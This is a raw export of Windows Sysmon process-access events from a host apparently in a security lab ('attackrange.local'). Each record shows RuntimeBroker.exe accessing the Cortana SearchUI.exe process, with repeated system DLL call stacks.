12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007513Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007512Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007511Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007510Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007509Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007508Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007507Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007506Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007505Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007504Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007503Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007502Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007501Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007500Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007499Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007498Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007497Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007496Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007495Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 